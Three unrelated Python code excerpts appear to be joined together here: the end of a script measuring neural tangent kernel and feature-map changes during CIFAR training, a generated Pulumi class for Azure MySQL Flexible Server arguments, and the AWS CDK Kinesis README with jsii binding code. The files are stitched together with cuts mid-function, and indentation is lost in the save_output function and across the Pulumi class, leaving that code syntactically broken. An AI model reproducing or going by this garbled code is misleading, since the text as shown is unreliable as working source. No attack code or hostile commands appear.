    plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_DIFF.png', bbox_inches='tight', dpi=1200)
    ntk_matrix_diff_norm = np.linalg.norm(ntk_matrix_diff.flatten())
    print(f'The total norm of the NTK sample diff is {ntk_matrix_diff_norm:.2f}')
    ntk_matrix_rdiff = np.abs(ntk_matrix_before - ntk_matrix_after) / (np.abs(ntk_matrix_before) + 1e-4)
    plt.imshow(ntk_matrix_rdiff)
    plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_RDIFF.png', bbox_inches='tight', dpi=1200)
    ntk_matrix_rdiff_norm = np.linalg.norm(ntk_matrix_rdiff.flatten())
    print(f'The total norm of the NTK sample relative diff is {ntk_matrix_rdiff_norm:.2f}')
    # Element-wise correlation map between the two NTK samples.
    n1_mean = np.mean(ntk_matrix_before)
    n2_mean = np.mean(ntk_matrix_after)
    matrix_corr = (ntk_matrix_before - n1_mean) * (ntk_matrix_after - n2_mean) / \
        np.std(ntk_matrix_before) / np.std(ntk_matrix_after)
    plt.imshow(matrix_corr)
    plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_CORR.png', bbox_inches='tight', dpi=1200)
    corr_coeff = np.mean(matrix_corr)
    print(f'The Correlation coefficient of the NTK sample before and after training is {corr_coeff:.2f}')
    matrix_sim = (ntk_matrix_before * ntk_matrix_after) / \
        np.sqrt(np.sum(ntk_matrix_before**2) * np.sum(ntk_matrix_after**2))
    # BUGFIX: this block previously re-plotted matrix_corr and overwrote the
    # CORR figure; plot the similarity matrix and save it under its own name.
    plt.imshow(matrix_sim)
    plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_SIM.png', bbox_inches='tight', dpi=1200)
    corr_tom = np.sum(matrix_sim)
    print(f'The Similarity coefficient of the NTK sample before and after training is {corr_tom:.2f}')
    save_output(args.table_path, name='ntk', width=config['width'], num_params=num_params,
                before_norm=ntk_matrix_before_norm, after_norm=ntk_matrix_after_norm,
                diff_norm=ntk_matrix_diff_norm, rdiff_norm=ntk_matrix_rdiff_norm,
                param_norm_before=param_norm_before, param_norm_after=param_norm_after,
                corr_coeff=corr_coeff, corr_tom=corr_tom)
    if args.pdist:
        # ---- Feature maps after training ----
        pdist_after, cos_after, prod_after = batch_feature_correlations(trainloader)
        pdist_after_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in pdist_after])
        cos_after_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in cos_after])
        prod_after_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in prod_after])
        print(f'The total norm of feature distances after training is {pdist_after_norm:.2f}')
        print(f'The total norm of feature cosine similarity after training is {cos_after_norm:.2f}')
        print(f'The total norm of feature inner product after training is {prod_after_norm:.2f}')
        save_plot(pdist_after, trainloader, name='pdist_after_training')
        save_plot(cos_after, trainloader, name='cosine_after_training')
        save_plot(prod_after, trainloader, name='prod_after_training')
        # Feature-map differences, normalized by the initial overall norm.
        pdist_ndiff = [np.abs(co1 - co2) / pdist_init_norm for co1, co2 in zip(pdist_init, pdist_after)]
        cos_ndiff = [np.abs(co1 - co2) / cos_init_norm for co1, co2 in zip(cos_init, cos_after)]
        prod_ndiff = [np.abs(co1 - co2) / prod_init_norm for co1, co2 in zip(prod_init, prod_after)]
        pdist_ndiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in pdist_ndiff])
        cos_ndiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in cos_ndiff])
        prod_ndiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in prod_ndiff])
        print(f'The total norm normalized diff of feature distances after training is {pdist_ndiff_norm:.2f}')
        print(f'The total norm normalized diff of feature cosine similarity after training is {cos_ndiff_norm:.2f}')
        print(f'The total norm normalized diff of feature inner product after training is {prod_ndiff_norm:.2f}')
        save_plot(pdist_ndiff, trainloader, name='pdist_ndiff')
        save_plot(cos_ndiff, trainloader, name='cosine_ndiff')
        save_plot(prod_ndiff, trainloader, name='prod_ndiff')
        # Feature-map differences, relative to the initial value element-wise.
        pdist_rdiff = [np.abs(co1 - co2) / (np.abs(co1) + 1e-6) for co1, co2 in zip(pdist_init, pdist_after)]
        cos_rdiff = [np.abs(co1 - co2) / (np.abs(co1) + 1e-6) for co1, co2 in zip(cos_init, cos_after)]
        prod_rdiff = [np.abs(co1 - co2) / (np.abs(co1) + 1e-6) for co1, co2 in zip(prod_init, prod_after)]
        pdist_rdiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in pdist_rdiff])
        cos_rdiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in cos_rdiff])
        prod_rdiff_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in prod_rdiff])
        print(f'The total norm relative diff of feature distances after training is {pdist_rdiff_norm:.2f}')
        print(f'The total norm relative diff of feature cosine similarity after training is {cos_rdiff_norm:.2f}')
        print(f'The total norm relative diff of feature inner product after training is {prod_rdiff_norm:.2f}')
        save_plot(pdist_rdiff, trainloader, name='pdist_rdiff')
        save_plot(cos_rdiff, trainloader, name='cosine_rdiff')
        save_plot(prod_rdiff, trainloader, name='prod_rdiff')
        # BUGFIX: the cos_* and prod_* columns previously received the pdist
        # values; write each statistic to its own column.
        save_output(args.table_path, 'pdist', width=config['width'], num_params=num_params,
                    pdist_init_norm=pdist_init_norm, pdist_after_norm=pdist_after_norm,
                    pdist_ndiff_norm=pdist_ndiff_norm, pdist_rdiff_norm=pdist_rdiff_norm,
                    cos_init_norm=cos_init_norm, cos_after_norm=cos_after_norm, cos_ndiff_norm=cos_ndiff_norm,
                    cos_rdiff_norm=cos_rdiff_norm,
                    prod_init_norm=prod_init_norm, prod_after_norm=prod_after_norm, prod_ndiff_norm=prod_ndiff_norm,
                    prod_rdiff_norm=prod_rdiff_norm)
    print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))
    print('-----------------------------------------------------')
    print('Job finished.----------------------------------------')
    print('-----------------------------------------------------')
def save_plot(cmaps, dataloader, name='before'):
    """Save the first correlation map to file, rows/cols sorted by target label."""
    _, targets = next(iter(dataloader))
    _, order = torch.sort(targets)
    sorted_map = cmaps[0][order, :][:, order]
    plt.imshow(sorted_map)
    plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_{name}.png', bbox_inches='tight', dpi=1200)
def save_output(out_dir, name, **kwargs):
"""Save keys to .csv files. Function from Micah."""
# Check for file
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
fname = os.path.join(out_dir, f'table_{args.net}_{name}.csv')
fieldnames = list(kwargs.keys())
# Read or write header
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['FlexibleServerArgs', 'FlexibleServer']
@pulumi.input_type
class FlexibleServerArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_password: Optional[pulumi.Input[str]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
delegated_subnet_id: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
high_availability: Optional[pulumi.Input['FlexibleServerHighAvailabilityArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
maintenance_window: Optional[pulumi.Input['FlexibleServerMaintenanceWindowArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
point_in_time_restore_time_in_utc: Optional[pulumi.Input[str]] = None,
private_dns_zone_id: Optional[pulumi.Input[str]] = None,
replication_role: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
source_server_id: Optional[pulumi.Input[str]] = None,
storage: Optional[pulumi.Input['FlexibleServerStorageArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a FlexibleServer resource.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the MySQL Flexible Server should exist. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MySQL Flexible Server. Required when `create_mode` is `Default`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] administrator_password: The Password associated with the `administrator_login` for the MySQL Flexible Server. Required when `create_mode` is `Default`.
:param pulumi.Input[int] backup_retention_days: The backup retention days for the MySQL Flexible Server. Possible values are between `7` and `35` days. Defaults to `7`.
:param pulumi.Input[str] create_mode: The creation mode which can be used to restore or replicate existing servers. Possible values are `Default`, `PointInTimeRestore`, `GeoRestore`, and `Replica`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] delegated_subnet_id: The ID of the virtual network subnet to create the MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Should geo redundant backup enabled? Defaults to `false`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input['FlexibleServerHighAvailabilityArgs'] high_availability: A `high_availability` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the MySQL Flexible Server should exist. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input['FlexibleServerMaintenanceWindowArgs'] maintenance_window: A `maintenance_window` block as defined below.
:param pulumi.Input[str] name: The name which should be used for this MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] point_in_time_restore_time_in_utc: The point in time to restore from `creation_source_server_id` when `create_mode` is `PointInTimeRestore`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] private_dns_zone_id: The ID of the private dns zone to create the MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] replication_role: The replication role. Possible value is `None`.
:param pulumi.Input[str] sku_name: The SKU Name for the MySQL Flexible Server.
:param pulumi.Input[str] source_server_id: The resource ID of the source MySQL Flexible Server to be restored. Required when `create_mode` is `PointInTimeRestore`, `GeoRestore`, and `Replica`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input['FlexibleServerStorageArgs'] storage: A `storage` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to the MySQL Flexible Server.
:param pulumi.Input[str] version: The version of the MySQL Flexible Server to use. Possible values are `5.7`, and `8.0.21`. Changing this forces a new MySQL Flexible Server to be created.
:param pulumi.Input[str] zone: The availability zone information of the MySQL Flexible Server. Possible values are `1`, `2` and `3`.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if administrator_login is not None:
pulumi.set(__self__, "administrator_login", administrator_login)
if administrator_password is not None:
pulumi.set(__self__, "administrator_password", administrator_password)
if backup_retention_days is not None:
pulumi.set(__self__, "backup_retention_days", backup_retention_days)
if create_mode is not None:
pulumi.set(__self__, "create_mode", create_mode)
if delegated_subnet_id is not None:
pulumi.set(__self__, "delegated_subnet_id", delegated_subnet_id)
if geo_redundant_backup_enabled is not None:
pulumi.set(__self__, "geo_redundant_backup_enabled", geo_redundant_backup_enabled)
if high_availability is not None:
pulumi.set(__self__, "high_availability", high_availability)
if location is not None:
pulumi.set(__self__, "location", location)
if maintenance_window is not None:
pulumi.set(__self__, "maintenance_window", maintenance_window)
if name is not None:
pulumi.set(__self__, "name", name)
if point_in_time_restore_time_in_utc is not None:
pulumi.set(__self__, "point_in_time_restore_time_in_utc", point_in_time_restore_time_in_utc)
if private_dns_zone_id is not None:
pulumi.set(__self__, "private_dns_zone_id", private_dns_zone_id)
if replication_role is not None:
pulumi.set(__self__, "replication_role", replication_role)
if sku_name is not None:
pulumi.set(__self__, "sku_name", sku_name)
if source_server_id is not None:
pulumi.set(__self__, "source_server_id", source_server_id)
if storage is not None:
pulumi.set(__self__, "storage", storage)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the MySQL Flexible Server should exist. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="administratorLogin")
def administrator_login(self) -> Optional[pulumi.Input[str]]:
"""
The Administrator Login for the MySQL Flexible Server. Required when `create_mode` is `Default`. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "administrator_login")
@administrator_login.setter
def administrator_login(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login", value)
@property
@pulumi.getter(name="administratorPassword")
def administrator_password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the `administrator_login` for the MySQL Flexible Server. Required when `create_mode` is `Default`.
"""
return pulumi.get(self, "administrator_password")
@administrator_password.setter
def administrator_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_password", value)
@property
@pulumi.getter(name="backupRetentionDays")
def backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
The backup retention days for the MySQL Flexible Server. Possible values are between `7` and `35` days. Defaults to `7`.
"""
return pulumi.get(self, "backup_retention_days")
@backup_retention_days.setter
def backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "backup_retention_days", value)
@property
@pulumi.getter(name="createMode")
def create_mode(self) -> Optional[pulumi.Input[str]]:
"""
The creation mode which can be used to restore or replicate existing servers. Possible values are `Default`, `PointInTimeRestore`, `GeoRestore`, and `Replica`. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "create_mode")
@create_mode.setter
def create_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_mode", value)
@property
@pulumi.getter(name="delegatedSubnetId")
def delegated_subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the virtual network subnet to create the MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "delegated_subnet_id")
@delegated_subnet_id.setter
def delegated_subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delegated_subnet_id", value)
@property
@pulumi.getter(name="geoRedundantBackupEnabled")
def geo_redundant_backup_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Should geo redundant backup enabled? Defaults to `false`. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "geo_redundant_backup_enabled")
@geo_redundant_backup_enabled.setter
def geo_redundant_backup_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "geo_redundant_backup_enabled", value)
@property
@pulumi.getter(name="highAvailability")
def high_availability(self) -> Optional[pulumi.Input['FlexibleServerHighAvailabilityArgs']]:
"""
A `high_availability` block as defined below.
"""
return pulumi.get(self, "high_availability")
@high_availability.setter
def high_availability(self, value: Optional[pulumi.Input['FlexibleServerHighAvailabilityArgs']]):
pulumi.set(self, "high_availability", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Region where the MySQL Flexible Server should exist. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maintenanceWindow")
def maintenance_window(self) -> Optional[pulumi.Input['FlexibleServerMaintenanceWindowArgs']]:
"""
A `maintenance_window` block as defined below.
"""
return pulumi.get(self, "maintenance_window")
@maintenance_window.setter
def maintenance_window(self, value: Optional[pulumi.Input['FlexibleServerMaintenanceWindowArgs']]):
pulumi.set(self, "maintenance_window", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="pointInTimeRestoreTimeInUtc")
def point_in_time_restore_time_in_utc(self) -> Optional[pulumi.Input[str]]:
"""
The point in time to restore from `creation_source_server_id` when `create_mode` is `PointInTimeRestore`. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "point_in_time_restore_time_in_utc")
@point_in_time_restore_time_in_utc.setter
def point_in_time_restore_time_in_utc(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "point_in_time_restore_time_in_utc", value)
@property
@pulumi.getter(name="privateDnsZoneId")
def private_dns_zone_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the private dns zone to create the MySQL Flexible Server. Changing this forces a new MySQL Flexible Server to be created.
"""
return pulumi.get(self, "private_dns_zone_id")
@private_dns_zone_id.setter
def private_dns_zone_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_dns_zone_id", value)
@property
@pulumi.getter(name="replicationRole")
def replication_role(self) -> Optional[pulumi.Input[str]]:
"""
The replication role. Possible value is `None`.
"""
return pulumi.get(self, "replication_role")
@replication_role.setter
def replication_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "replication_role", value)
@property
@pulumi.getter(name="skuName")
def sku_name(self) -> Optional[pulumi.Input[str]]:
"""
The SKU Name for the MySQL | |
'''
# Amazon Kinesis Construct Library
<!--BEGIN STABILITY BANNER-->---


---
<!--END STABILITY BANNER-->
[Amazon Kinesis](https://docs.aws.amazon.com/streams/latest/dev/introduction.html) provides collection and processing of large
[streams](https://aws.amazon.com/streaming-data/) of data records in real time. Kinesis data streams can be used for rapid and continuous data
intake and aggregation.
## Table Of Contents
* [Streams](#streams)
* [Encryption](#encryption)
* [Import](#import)
* [Permission Grants](#permission-grants)
* [Read Permissions](#read-permissions)
* [Write Permissions](#write-permissions)
* [Custom Permissions](#custom-permissions)
* [Metrics](#metrics)
## Streams
Amazon Kinesis Data Streams ingests a large amount of data in real time, durably stores the data, and makes the data available for consumption.
Using the CDK, a new Kinesis stream can be created as part of the stack using the construct's constructor. You may specify the `streamName` to give
your own identifier to the stream. If not, CloudFormation will generate a name.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
Stream(self, "MyFirstStream",
stream_name="my-awesome-stream"
)
```
You can also specify properties such as `shardCount` to indicate how many shards the stream should use and a `retentionPeriod`
to specify how long the data in the shards should remain accessible.
Read more at [Creating and Managing Streams](https://docs.aws.amazon.com/streams/latest/dev/working-with-streams.html)
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
Stream(self, "MyFirstStream",
stream_name="my-awesome-stream",
shard_count=3,
retention_period=Duration.hours(48)
)
```
### Encryption
[Stream encryption](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesis-stream-streamencryption.html) enables
server-side encryption using an AWS KMS key for a specified stream.
Encryption is enabled by default on your stream with the master key owned by Kinesis Data Streams in regions where it is supported.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
Stream(self, "MyEncryptedStream")
```
You can enable encryption on your stream with a user-managed key by specifying the `encryption` property.
A KMS key will be created for you and associated with the stream.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
Stream(self, "MyEncryptedStream",
encryption=StreamEncryption.KMS
)
```
You can also supply your own external KMS key to use for stream encryption by specifying the `encryptionKey` property.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_kms as kms
key = kms.Key(self, "MyKey")
Stream(self, "MyEncryptedStream",
encryption=StreamEncryption.KMS,
encryption_key=key
)
```
### Import
Any Kinesis stream that has been created outside the stack can be imported into your CDK app.
Streams can be imported by their ARN via the `Stream.fromStreamArn()` API
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
stack = Stack(app, "MyStack")
imported_stream = Stream.from_stream_arn(stack, "ImportedStream", "arn:aws:kinesis:us-east-2:123456789012:stream/f3j09j2230j")
```
Encrypted Streams can also be imported by their attributes via the `Stream.fromStreamAttributes()` API
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
from aws_cdk.aws_kms import Key
stack = Stack(app, "MyStack")
imported_stream = Stream.from_stream_attributes(stack, "ImportedEncryptedStream",
stream_arn="arn:aws:kinesis:us-east-2:123456789012:stream/f3j09j2230j",
encryption_key=kms.Key.from_key_arn("arn:aws:kms:us-east-1:123456789012:key/12345678-1234-1234-1234-123456789012")
)
```
### Permission Grants
IAM roles, users or groups which need to be able to work with Amazon Kinesis streams at runtime should be granted IAM permissions.
Any object that implements the `IGrantable` interface (has an associated principal) can be granted permissions by calling:
* `grantRead(principal)` - grants the principal read access
* `grantWrite(principal)` - grants the principal write permissions to a Stream
* `grantReadWrite(principal)` - grants principal read and write permissions
#### Read Permissions
Grant `read` access to a stream by calling the `grantRead()` API.
If the stream has an encryption key, read permissions will also be granted to the key.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
lambda_role = iam.Role(self, "Role",
assumed_by=iam.ServicePrincipal("lambda.amazonaws.com"),
description="Example role..."
)
stream = Stream(self, "MyEncryptedStream",
encryption=StreamEncryption.KMS
)
# give lambda permissions to read stream
stream.grant_read(lambda_role)
```
The following read permissions are provided to a service principal by the `grantRead()` API:
* `kinesis:DescribeStreamSummary`
* `kinesis:GetRecords`
* `kinesis:GetShardIterator`
* `kinesis:ListShards`
* `kinesis:SubscribeToShard`
#### Write Permissions
Grant `write` permissions to a stream by calling the `grantWrite()` API.
If the stream has an encryption key, write permissions will also be granted to the key.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
lambda_role = iam.Role(self, "Role",
assumed_by=iam.ServicePrincipal("lambda.amazonaws.com"),
description="Example role..."
)
stream = Stream(self, "MyEncryptedStream",
encryption=StreamEncryption.KMS
)
# give lambda permissions to write to stream
stream.grant_write(lambda_role)
```
The following write permissions are provided to a service principal by the `grantWrite()` API:
* `kinesis:ListShards`
* `kinesis:PutRecord`
* `kinesis:PutRecords`
#### Custom Permissions
You can add any set of permissions to a stream by calling the `grant()` API.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
user = iam.User(stack, "MyUser")
stream = Stream(stack, "MyStream")
# give my user permissions to list shards
stream.grant(user, "kinesis:ListShards")
```
### Metrics
You can use common metrics from your stream to create alarms and/or dashboards. The `stream.metric('MetricName')` method creates a metric with the stream namespace and dimension. You can also use pre-defined metric methods like `stream.metricGetRecordsSuccess()`. To find out more about Kinesis metrics check [Monitoring the Amazon Kinesis Data Streams Service with Amazon CloudWatch](https://docs.aws.amazon.com/streams/latest/dev/monitoring-with-cloudwatch.html).
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
stream = Stream(stack, "MyStream")
# Using base metric method passing the metric name
stream.metric("GetRecords.Success")
# using pre-defined metric method
stream.metric_get_records_success()
# using pre-defined and overriding the statistic
stream.metric_get_records_success(statistic="Maximum")
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from ._jsii import *
import aws_cdk.aws_cloudwatch
import aws_cdk.aws_iam
import aws_cdk.aws_kms
import aws_cdk.core
import constructs
# jsii proxy class: every property/method below forwards to the JavaScript-side
# implementation via jsii.get/jsii.set/jsii.invoke; nothing is computed in Python.
# NOTE(review): this looks like generated binding code — presumably regenerated by
# tooling, so hand edits may be overwritten; confirm before changing logic here.
@jsii.implements(aws_cdk.core.IInspectable)
class CfnStream(
    aws_cdk.core.CfnResource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@aws-cdk/aws-kinesis.CfnStream",
):
    '''A CloudFormation ``AWS::Kinesis::Stream``.
    :cloudformationResource: AWS::Kinesis::Stream
    :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html
    '''
    def __init__(
        self,
        scope: aws_cdk.core.Construct,
        id: builtins.str,
        *,
        shard_count: jsii.Number,
        name: typing.Optional[builtins.str] = None,
        retention_period_hours: typing.Optional[jsii.Number] = None,
        stream_encryption: typing.Optional[typing.Union["CfnStream.StreamEncryptionProperty", aws_cdk.core.IResolvable]] = None,
        tags: typing.Optional[typing.Sequence[aws_cdk.core.CfnTag]] = None,
    ) -> None:
        '''Create a new ``AWS::Kinesis::Stream``.
        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param shard_count: ``AWS::Kinesis::Stream.ShardCount``.
        :param name: ``AWS::Kinesis::Stream.Name``.
        :param retention_period_hours: ``AWS::Kinesis::Stream.RetentionPeriodHours``.
        :param stream_encryption: ``AWS::Kinesis::Stream.StreamEncryption``.
        :param tags: ``AWS::Kinesis::Stream.Tags``.
        '''
        # Bundle the keyword arguments into a typed props struct, then let jsii
        # construct and register the underlying JS resource object.
        props = CfnStreamProps(
            shard_count=shard_count,
            name=name,
            retention_period_hours=retention_period_hours,
            stream_encryption=stream_encryption,
            tags=tags,
        )
        jsii.create(CfnStream, self, [scope, id, props])
    @jsii.member(jsii_name="inspect")
    def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
        '''Examines the CloudFormation resource and discloses attributes.
        :param inspector: - tree inspector to collect and process attributes.
        '''
        return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
    @jsii.member(jsii_name="renderProperties")
    def _render_properties(
        self,
        props: typing.Mapping[builtins.str, typing.Any],
    ) -> typing.Mapping[builtins.str, typing.Any]:
        '''
        :param props: -
        '''
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
    # Static lookup of the CloudFormation type string (read from the JS class).
    @jsii.python.classproperty # type: ignore[misc]
    @jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
    def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
        '''The CloudFormation resource type name for this resource class.'''
        return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrArn")
    def attr_arn(self) -> builtins.str:
        '''
        :cloudformationAttribute: Arn
        '''
        return typing.cast(builtins.str, jsii.get(self, "attrArn"))
    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="cfnProperties")
    def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
        # Raw property bag used by renderProperties when synthesizing the template.
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="tags")
    def tags(self) -> aws_cdk.core.TagManager:
        '''``AWS::Kinesis::Stream.Tags``.
        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-tags
        '''
        return typing.cast(aws_cdk.core.TagManager, jsii.get(self, "tags"))
    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="shardCount")
    def shard_count(self) -> jsii.Number:
        '''``AWS::Kinesis::Stream.ShardCount``.
        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-shardcount
        '''
        return typing.cast(jsii.Number, jsii.get(self, "shardCount"))
    @shard_count.setter
    def shard_count(self, value: jsii.Number) -> None:
        jsii.set(self, "shardCount", value)
    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="name")
    def name(self) -> typing.Optional[builtins.str]:
        '''``AWS::Kinesis::Stream.Name``.
        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-name
        '''
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "name"))
    @name.setter
    def name(self, value: typing.Optional[builtins.str]) -> None:
        jsii.set(self, "name", value)
    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="retentionPeriodHours")
    def retention_period_hours(self) -> typing.Optional[jsii.Number]:
        '''``AWS::Kinesis::Stream.RetentionPeriodHours``.
        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-retentionperiodhours
        '''
        return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "retentionPeriodHours"))
    @retention_period_hours.setter
    def retention_period_hours(self, value: typing.Optional[jsii.Number]) -> None:
        jsii.set(self, "retentionPeriodHours", value)
    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="streamEncryption")
    def stream_encryption(
        self,
    ) -> typing.Optional[typing.Union["CfnStream.StreamEncryptionProperty", aws_cdk.core.IResolvable]]:
        '''``AWS::Kinesis::Stream.StreamEncryption``.
        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-streamencryption
        '''
        return typing.cast(typing.Optional[typing.Union["CfnStream.StreamEncryptionProperty", aws_cdk.core.IResolvable]], jsii.get(self, "streamEncryption"))
    @stream_encryption.setter
    def stream_encryption(
        self,
        value: typing.Optional[typing.Union["CfnStream.StreamEncryptionProperty", aws_cdk.core.IResolvable]],
    ) -> None:
        jsii.set(self, "streamEncryption", value)
    # Plain data struct mirroring the StreamEncryption CloudFormation sub-property;
    # name_mapping translates the Python snake_case keys to the JS camelCase ones.
    @jsii.data_type(
        jsii_type="@aws-cdk/aws-kinesis.CfnStream.StreamEncryptionProperty",
        jsii_struct_bases=[],
        name_mapping={"encryption_type": "encryptionType", "key_id": "keyId"},
    )
    class StreamEncryptionProperty:
        def __init__(
            self,
            *,
            encryption_type: builtins.str,
            key_id: builtins.str,
        ) -> None:
            '''
